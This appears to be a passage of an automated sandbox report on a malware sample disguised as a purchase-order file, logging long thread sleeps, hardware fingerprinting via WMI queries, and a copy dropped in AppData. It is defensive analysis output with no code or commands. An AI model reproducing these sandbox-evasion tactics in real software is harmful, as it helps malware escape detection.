                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2398547s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2398437s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2398327s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2398199s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2398078s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2397963s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2397731s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2397469s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2397359s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2397250s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2397141s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2397031s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2396922s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2396807s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2396702s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2396594s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2396484s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2396375s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2396266s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2396156s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2396047s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2395938s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2395797s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2395672s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2395562s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2395438s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2395313s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2395201s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2394969s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2394840s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2394734s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2394625s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2394516s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2394406s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2394297s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2394188s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2394063s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2393953s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5552 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep count: 39 > 30
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -35971150943733603s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2400000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7064 | Thread sleep count: 3599 > 30
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2399891s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7064 | Thread sleep count: 6255 > 30
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2399766s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2399656s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2399547s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2399437s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2399328s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2399218s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2399108s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2399000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2398890s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2398781s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2398672s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2398562s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2398453s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2398343s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2398234s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2398124s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2398015s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2397899s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2397789s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2397649s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2397540s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2397437s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2397328s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2397219s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2397109s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2396999s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2396890s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2396781s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2396669s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2396562s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2396453s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2396344s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2396234s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2396125s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2396015s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2395905s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2395797s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2395687s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2395578s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2395468s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2395359s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2395250s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2395140s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2395031s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2394921s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2394812s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2394703s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5432 | Thread sleep time: -2394581s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Last function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2400000Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2399868Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2399748Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2399640Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2399531Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2399419Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2399297Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2399181Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2399063Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2398938Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2398813Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2398688Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2398576Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2398396Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2398262Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2398101Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2397985Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2397860Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2397735Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2397606Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2397485Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2397360Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2397235Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2397110Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2396985Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2396860Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2396735Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2396610Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2396485Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2396360Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2396235Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2396110Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2395985Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2395860Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2395699Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2395336Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2395219Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2395109Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2394999Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2394891Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2394781Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2394672Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2394563Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2394453Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2394342Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2394234Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2394121Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2394000Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2393891Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2393766Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2393641Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2393531Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2400000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399875Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399765Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399656Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399546Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399438Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399328Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399218Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399107Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398999Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398891Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398766Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398656Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398547Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398437Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398327Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398199Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398078Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397963Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397731Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397469Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397359Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397250Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397141Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397031Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396922Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396807Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396702Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396594Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396484Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396375Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396266Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396156Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396047Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395938Jump to behavior
